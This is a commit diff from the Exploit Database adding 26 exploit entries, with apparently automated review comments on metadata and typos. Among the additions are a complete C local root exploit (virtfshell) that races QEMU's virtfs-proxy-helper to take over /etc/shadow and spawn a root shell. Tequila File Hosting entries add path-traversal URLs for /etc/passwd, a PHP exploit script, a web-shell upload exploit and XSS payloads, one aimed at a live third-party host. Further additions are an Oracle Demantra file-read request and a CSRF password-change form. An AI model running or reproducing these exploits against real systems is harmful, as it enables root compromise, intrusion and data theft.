Commit 4ac8afe

author
Offensive Security
committed
DB: 2015-12-18
26 new exploits
1 parent cc15679 commit 4ac8afe

27 files changed

Lines changed: 915 additions & 0 deletions

files.csv

Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -35239,6 +35239,7 @@ id,file,description,date,author,platform,type,port
3523935239
38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80
3524035240
38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",2015-12-15,metasploit,jsp,remote,8020
3524135241
38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization Vulnerability",2015-12-15,metasploit,java,remote,8080
35242+
38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80
3524235243
38985,platforms/php/webapps/38985.txt,"Dredge School Administration System /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
3524335244
38986,platforms/php/webapps/38986.txt,"Dredge School Administration System /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
3524435245
38987,platforms/php/webapps/38987.html,"Dredge School Administration System /DSM/loader.php Admin Account Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
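
Review bot: the added 38984 row records the date as 2015-12-15, while the advisory this commit adds at platforms/php/webapps/38984.txt states `# Date: 16/12/2015`. If the column is meant to carry the advisory date it should read 2015-12-16; if it is the database publication date no change is needed, but the mismatch is worth confirming. The author column also credits "Ashiyane Digital Security Team" where the advisory footer credits Ehsan Hosseini, which affects author searches.
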
@@ -35261,3 +35262,28 @@ id,file,description,date,author,platform,type,port
3526135262
39005,platforms/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0
3526235263
39006,platforms/multiple/dos/39006.txt,"Wireshark - getRate Stack-Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0
3526335264
39007,platforms/java/remote/39007.txt,"FireEye Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0
35265+
39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80
35266+
39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80
35267+
39010,platforms/linux/local/39010.c,"Gentoo Local Priv Escalation in QEMU",2015-12-17,zx2c4,linux,local,0
35268+
39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script /products.php Multiple Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
35269+
39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script /news.php id Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
35270+
39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping Admin Password Cross Site Request Forgery Vulnerability",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
35271+
39014,platforms/php/webapps/39014.txt,"EZGenerator Local File Disclosure and Cross Site Request Forgery Vulnerabilities",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
35272+
39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server Email Body HTML Injection Vulnerability",2014-01-14,"Zhao Liang",php,webapps,0
35273+
39016,platforms/php/webapps/39016.txt,"Joomla! Almond Classifieds Component Arbitrary File Upload Vulnerability",2014-01-10,DevilScreaM,php,webapps,0
35274+
39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80
35275+
39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite Remote Security Vulnerability",2014-01-14,Oracle,multiple,remote,0
35276+
39019,platforms/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
35277+
39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
35278+
39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
35279+
39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
35280+
39023,platforms/android/dos/39023.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-12-17,"Google Security Research",android,dos,0
35281+
39024,platforms/android/dos/39024.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-12-17,"Google Security Research",android,dos,0
35282+
39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
35283+
39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0
35284+
39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0
35285+
39028,platforms/php/webapps/39028.txt,"Joomla! Sexy Polling Extension 'answer_id' Parameter SQL Injection Vulnerability",2014-01-16,"High-Tech Bridge",php,webapps,0
35286+
39029,platforms/php/webapps/39029.txt,"bloofoxCMS /bloofox/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
35287+
39030,platforms/php/webapps/39030.txt,"bloofoxCMS /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
35288+
39031,platforms/php/webapps/39031.html,"bloofoxCMS /admin/index.php Admin User Creation CSRF",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
35289+
39032,platforms/php/webapps/39032.txt,"bloofoxCMS /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
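
Review bot: several added rows carry metadata defects that will break exact-match filtering on this CSV. The author field is written as "AtT4CKxT3rR0r1ST " with a trailing space inside the quotes (39011 to 39014 and 39029 to 39032), 39026 misspells "Dereference" as "Derefence", and the three win32k entries by the same author are split across platform values, with 39025 under windows and 39026 and 39027 under win32. Trim the author value, fix the spelling, and pick one platform value for the win32k set.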

platforms/android/dos/39023.txt

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
Source: https://code.google.com/p/google-security-research/issues/detail?id=500
2+
3+
There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif.
4+
5+
D/skia (10905): GIF - Parse error
6+
D/skia (10905): --- decoder->decode returned false
7+
F/libc (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0)
8+
I/DEBUG ( 2958): pid: 10905, tid: 11276, name: thread-pool-0 >>> com.sec.android.gallery3d <<<
9+
I/DEBUG ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac
10+
I/DEBUG ( 2958): x0 0000000000000001 x1 0000000089f725ac x2 0000000000000000 x3 00000000fff9038c
11+
I/DEBUG ( 2958): x4 0000007f9c300000 x5 000000000000001f x6 0000000000000001 x7 0000007f9c620048
12+
I/DEBUG ( 2958): x8 0000000000000000 x9 0000000000000000 x10 0000000000000080 x11 0000000000003758
13+
I/DEBUG ( 2958): x12 0000000000000020 x13 0000000000000020 x14 00000000000000a5 x15 000000000000001f
14+
I/DEBUG ( 2958): x16 00000000ffffe4e3 x17 00000000000000a5 x18 0000007f9c300000 x19 0000007f9c61fc00
15+
I/DEBUG ( 2958): x20 0000007f9c664080 x21 0000000089e76b2c x22 000000000000003b x23 0000000000000001
16+
I/DEBUG ( 2958): x24 0000000000000020 x25 0000000000000020 x26 0000000000000020 x27 0000007f9c664080
17+
I/DEBUG ( 2958): x28 00000000000001da x29 0000000032e89ae0 x30 0000007faad70e64
18+
I/DEBUG ( 2958): sp 0000007f9cfff170 pc 0000007faad72dbc pstate 0000000080000000
19+
I/DEBUG ( 2958):
20+
I/DEBUG ( 2958): backtrace:
21+
I/DEBUG ( 2958): #00 pc 000000000002ddbc /system/lib64/libSecMMCodec.so (ColorMap+200)
22+
I/DEBUG ( 2958): #01 pc 000000000002be60 /system/lib64/libSecMMCodec.so (decodeGIF+340)
23+
I/DEBUG ( 2958): #02 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
24+
I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
25+
26+
To reproduce, download the file and open it in Gallery
27+
28+
29+
Proof of Concept:
30+
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39023.zip
31+
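
Review bot: the report omits the tested device and build, which the sibling report 39024.txt states ("SM-G925V device running build number LRX22G.G925VVRU1AOE2"). Without it, the crash at ColorMap+200 in libSecMMCodec.so cannot be tied to a firmware version when checking whether a device is patched; add the same line here. The proof-of-concept archive is referenced only by URL, so a checksum of 39023.zip next to the link would let readers confirm they hold the file the report describes. Minor: "application load" should read "application loads".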

platforms/android/dos/39024.txt

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
Source: https://code.google.com/p/google-security-research/issues/detail?id=497
2+
3+
Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds.
4+
5+
I/DEBUG ( 2961): pid: 12383, tid: 12549, name: thread-pool-1 >>> com.sec.android.gallery3d <<<
6+
I/DEBUG ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000
7+
8+
I/DEBUG ( 2961): x0 0000000089e8117c x1 00000000000000ff x2 00000000177fe13c x3 0000000089e8117c
9+
I/DEBUG ( 2961): x4 0000000000000004 x5 0000007f65f42300 x6 0000000000000002 x7 ffffffffffffffff
10+
I/DEBUG ( 2961): x8 0000000089e83ff0 x9 0000007f65f020b0 x10 000000000000003c x11 000000000000003b
11+
I/DEBUG ( 2961): x12 0000007f65f02080 x13 00000000ffffffff x14 0000007f65f02080 x15 00000000000061e0
12+
I/DEBUG ( 2961): x16 0000007f6baccc10 x17 0000007f958f8d80 x18 0000007f9596da40 x19 0000007f65f0e180
13+
I/DEBUG ( 2961): x20 0000007f65f54020 x21 00000000002f0020 x22 0000000000000020 x23 0000000005e00400
14+
I/DEBUG ( 2961): x24 0000000000000004 x25 0000007f65f42300 x26 0000000000000020 x27 0000007f65f52080
15+
I/DEBUG ( 2961): x28 00000000000001da x29 0000000013071460 x30 0000007f6ba7e40c
16+
I/DEBUG ( 2961): sp 0000007f66796130 pc 0000007f958f8e28 pstate 0000000020000000
17+
I/DEBUG ( 2961):
18+
I/DEBUG ( 2961): backtrace:
19+
I/InjectionManager(12532): Inside getClassLibPath caller
20+
I/DEBUG ( 2961): #00 pc 0000000000019e28 /system/lib64/libc.so (memset+168)
21+
I/DEBUG ( 2961): #01 pc 0000000000030408 /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
22+
I/DEBUG ( 2961): #02 pc 0000000000033440 /system/lib64/libSecMMCodec.so (DecodeFile+120)
23+
I/DEBUG ( 2961): #03 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
24+
I/DEBUG ( 2961): #04 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
25+
26+
To reproduce, download the file and open it in Gallery.
27+
28+
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
29+
30+
31+
Proof of Concept:
32+
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39024.zip
33+
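
Review bot: line 19 of the added file, `I/InjectionManager(12532): Inside getClassLibPath caller`, is an unrelated logcat line from a different process (12532) that landed between `backtrace:` and frame #00. Drop it so the tombstone reads as one contiguous crash record for pid 12383. The rest of the trace supports the summary as written: frame #00 is memset+168 in libc.so called from sbmpd_decode_rle_complete+64, and the fault address 0x89e84000 is page-aligned with SEGV_ACCERR, which fits a write running off the end of a mapping.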

platforms/linux/local/39010.c

Lines changed: 97 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,97 @@
1+
2+
/* == virtfshell ==
3+
*
4+
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
5+
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
6+
* virtfs-proxy-helper makes some sort of flimsy check to make sure
7+
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
8+
*
9+
* This should spawn a root shell eventually on vulnerable systems.
10+
*
11+
* - zx2c4
12+
* 2015-12-12
13+
*
14+
*
15+
* zx2c4@thinkpad ~ $ lsb_release -i
16+
* Distributor ID: Gentoo
17+
* zx2c4@thinkpad ~ $ ./virtfshell
18+
* == Virtfshell - by zx2c4 ==
19+
* [+] Trying to win race, attempt 749
20+
* [+] Chown'd /etc/shadow, elevating to root
21+
* [+] Cleaning up
22+
* [+] Spawning root shell
23+
* thinkpad zx2c4 # whoami
24+
* root
25+
*
26+
*/
27+
28+
#include <stdio.h>
29+
#include <sys/wait.h>
30+
#include <sys/stat.h>
31+
#include <sys/types.h>
32+
#include <sys/inotify.h>
33+
#include <unistd.h>
34+
#include <stdlib.h>
35+
#include <signal.h>
36+
37+
38+
static int it_worked(void)
39+
{
40+
struct stat sbuf = { 0 };
41+
stat("/etc/shadow", &sbuf);
42+
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
43+
}
44+
45+
int main(int argc, char **argv)
46+
{
47+
int fd;
48+
pid_t pid;
49+
char uid[12], gid[12];
50+
size_t attempts = 0;
51+
52+
sprintf(uid, "%d", getuid());
53+
sprintf(gid, "%d", getgid());
54+
55+
printf("== Virtfshell - by zx2c4 ==\n");
56+
57+
printf("[+] Beginning race loop\n");
58+
59+
while (!it_worked()) {
60+
printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts);
61+
fd = inotify_init();
62+
unlink("/tmp/virtfshell/sock");
63+
mkdir("/tmp/virtfshell", 0777);
64+
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
65+
pid = fork();
66+
if (pid == -1)
67+
continue;
68+
if (!pid) {
69+
close(0);
70+
close(1);
71+
close(2);
72+
execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
73+
_exit(1);
74+
}
75+
read(fd, 0, 0);
76+
unlink("/tmp/virtfshell/sock");
77+
symlink("/etc/shadow", "/tmp/virtfshell/sock");
78+
close(fd);
79+
kill(pid, SIGKILL);
80+
wait(NULL);
81+
}
82+
83+
printf("[+] Chown'd /etc/shadow, elevating to root\n");
84+
85+
system( "cp /etc/shadow /tmp/original_shadow;"
86+
"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
87+
"cat /tmp/modified_shadow > /etc/shadow;"
88+
"su -c '"
89+
" echo [+] Cleaning up;"
90+
" cat /tmp/original_shadow > /etc/shadow;"
91+
" chown root:root /etc/shadow;"
92+
" rm /tmp/modified_shadow /tmp/original_shadow;"
93+
" echo [+] Spawning root shell;"
94+
" exec /bin/bash -i"
95+
"'");
96+
return 0;
97+
}
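
Review bot: the header comment explains the root cause (virtfs-proxy-helper installed SUID or with CAP_CHOWN, plus a TOCTOU on the socket path check) but never says which QEMU versions or packages ship the helper that way, and the files.csv title only says "Gentoo". Add the affected package and version range and the remediation the comment implies, namely shipping the helper without the SUID bit or file capabilities. The header should also state the side effect visible in the final `system()` call: /etc/shadow is overwritten and is restored only inside the `su -c` block, so a run where that block does not execute leaves the file modified and /tmp/original_shadow behind.
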
Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
source: http://www.securityfocus.com/bid/64836/info
2+
3+
Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.
4+
5+
The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.
6+
7+
Attackers can exploit this issue to obtain sensitive information.
8+
9+
This vulnerability affects the following supported versions:
10+
12.2.0, 12.2.1, 12.2.2
11+
12+
POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
13+
Host: target.com:8080
14+
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
15+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
16+
Accept-Language: en-US,en;q=0.5
17+
Accept-Encoding: gzip, deflate
18+
DNT: 1
19+
Connection: keep-alive
20+
Content-Type: application/x-www-form-urlencoded
21+
Content-Length: 46
22+
23+
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
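
Review bot: the description never names the flaw that the request demonstrates. The prose says only "a remote vulnerability" that lets attackers "obtain sensitive information", while the request line reaches GraphServlet through `loginCheck.jsp/../../` and the body passes a server file path in `filename`. State that in the text so defenders know what to look for in access logs, and add the vendor advisory reference alongside the SecurityFocus link. The `Content-Length: 46` header also does not match the body shown, so the request should be marked as edited rather than a verbatim capture.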

platforms/php/webapps/38984.txt

Lines changed: 132 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,132 @@
1+
================================================================================
2+
Tequila File Hosting Arbitrary File Download
3+
================================================================================
4+
# Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312
5+
# Date: 16/12/2015
6+
# Author: Ashiyane Digital Security Team
7+
# Version: 1.5
8+
# Contact: hehsan979@gmail.com
9+
# Source: http://ehsansec.ir/advisories/tequila-disclose.txt
10+
================================================================================
11+
# Description:
12+
Tequila is a solid, safe, fast, simple and intuitive script which
13+
allows companies or individuals to upload, manage and share their
14+
files online. It is studied in every feature and was produced with
15+
attention to every detail.
16+
17+
# PoC :
18+
19+
# Download Config
20+
http://localhost/tequila/download.php?download.php?filename=files/../include/php/constants.php&name=file.php
21+
22+
# Download passwd
23+
http://localhost/tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd
24+
25+
26+
# (PHP Exploit):
27+
28+
<?php
29+
// page : download.php
30+
echo "Tequila File Hosting Arbitrary File Download Exploiter\n";
31+
echo "Discoverd By Ehsan Hosseini\n\n\n";
32+
$ch = curl_init();
33+
curl_setopt($ch, CURLOPT_URL,
34+
"http://SERVER/download.php?filename=files/../include/php/constants.php&name=file.php");
35+
curl_setopt($ch, CURLOPT_HTTPGET, 1);
36+
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
37+
5.01; Windows NT 5.0)");
38+
$buf = curl_exec ($ch);
39+
curl_close($ch);
40+
unset($ch);
41+
echo $buf;
42+
?>
43+
44+
# Vulnerabile code:
45+
46+
<?php
47+
//This script forces the download of the file
48+
49+
//Retrieving the file name from the querystring
50+
//and the stepping stone path to the download folder
51+
$fn = (isset($_GET['filename']) ? $_GET['filename'] : false);
52+
$file = $fn;
53+
$sn = (isset($_GET['name']) ? $_GET['name'] : false);
54+
$secure_name = $sn;
55+
56+
if (strpos($file, "files/") !== false) {
57+
$checkdownload = "true";
58+
} else {
59+
$checkdownload = "false";
60+
}
61+
62+
//I verify that the file exists
63+
if($checkdownload == "true"){
64+
if (!file_exists($file)) {
65+
//If there is mold an error
66+
echo "The file does not exist!";
67+
} else {
68+
//If the file exists ...
69+
//Imposed on the header of the page to force the download of the file
70+
header("Cache-Control: public");
71+
header("Content-Description: File Transfer");
72+
header('Content-Type: application/zip');
73+
header("Content-Disposition: attachment; filename= " . $secure_name);
74+
header("Content-Transfer-Encoding: binary");
75+
header('Connection: Keep-Alive');
76+
header('Expires: 0');
77+
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
78+
header('Pragma: public');
79+
//I read the contents of the file
80+
readfile($file);
81+
exit;
82+
}
83+
}
84+
?>
85+
86+
#######################################################################
87+
88+
================================================================================
89+
Tequila File Hosting Unrestricted File Upload
90+
================================================================================
91+
92+
# PoC :
93+
First register in the site===>
94+
http://localhost/tequila/register.php
95+
96+
Next using this exploit :
97+
98+
<?php
99+
// page : upload.php
100+
$postData = array('folder' => '/username', 'file' => '@shell.php');
101+
$ch = curl_init();
102+
curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php");
103+
curl_setopt($ch, CURLOPT_POST, 1);
104+
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
105+
$buf = curl_exec ($ch);
106+
curl_close($ch);
107+
unset($ch);
108+
echo $buf;
109+
?>
110+
111+
or
112+
113+
curl -i -F folder='/ehsann' -F file=@ehsan.png
114+
http://localhost/tequila/upload.php
115+
116+
Sheller uploaded.
117+
118+
Path of shell : http://localhost/tequila/files/username/shell.php
119+
120+
#######################################################################
121+
122+
================================================================================
123+
Tequila File Hosting Coss Site Scripting
124+
================================================================================
125+
126+
# PoC :
127+
http://localhost/files.php?folder="><script>alert('Ehsan')</script>
128+
http://easyhost.me/file.php?file="><script>alert('Ehsan')</script>
129+
130+
================================================================================
131+
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
132+
================================================================================
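
Review bot: the second cross-site scripting line points at a live third-party host (`http://easyhost.me/file.php?...`) while every other URL in the advisory uses localhost or SERVER; replace it with the same placeholder. The advisory quotes the vulnerable check, `strpos($file, "files/") !== false`, which only tests that the substring appears somewhere in the parameter, but gives no remediation. A short fix section (resolve the requested path with realpath() and require the result to stay under the files directory, and sanitise `name` before it is placed in the Content-Disposition header) would make the entry usable for patching. Typos to correct: "Coss Site Scripting", "Vulnerabile", "Discoverd"; the first download URL also repeats `download.php?` twice.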

platforms/php/webapps/39011.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/64734/info
2+
3+
UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
4+
5+
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
6+
7+
http://www.example.com/products.php?cat_id=4
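
Review bot: the entry is titled "Multiple Parameter SQL Injection" in files.csv, but the only URL given is `products.php?cat_id=4`, which names one parameter and shows an ordinary request. List the affected parameters explicitly so the entry can be matched against application code or filtering rules.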

platforms/php/webapps/39012.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/64734/info
2+
3+
UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
4+
5+
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
6+
7+
http://www.example.com/news.php?id=1
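
Review bot: the text is a verbatim copy of 39011.txt, including the same SecurityFocus source (bid/64734) and the phrase "multiple SQL-injection vulnerabilities", although files.csv scopes this entry to the `id` parameter of news.php. Reword the description to the single parameter this file covers, or merge the two files into one entry for the advisory.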

platforms/php/webapps/39013.html

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
source: http://www.securityfocus.com/bid/64735/info
2+
3+
Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
4+
5+
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
6+
7+
<form method=�POST� name=�form0? action=� http://www.example.com/adminpanel/edit_admin.php�>
8+
<input type=�hidden� name=�userid� value=�ADMIN�/>
9+
<input type=�hidden� name=�pass� value=�12121212?/>
10+
<input type=�hidden� name=�retypepass� value=�12121212?/>
11+
<input type=�hidden� name=�addnew� value=�1?/>
12+
<input type=�hidden� name=�action� value=�save�/>
13+
<input type=�hidden� name=�new� value=�Submit�/>
14+
</form>
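
Review bot: the attribute delimiters in the form are encoding damage, not quotes. Values are wrapped in replacement characters and several close with `?` (for example, the form's `name` value ends in `form0?`), so this .html file is not well-formed markup. The original typographic quotes were lost in a charset conversion; re-save the file as UTF-8 with plain ASCII double quotes. The last sentence of the description ("Successful exploits will compromise affected computers") also overstates what the form shows, which is a password change submitted to edit_admin.php with no anti-CSRF token and no current-password field.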
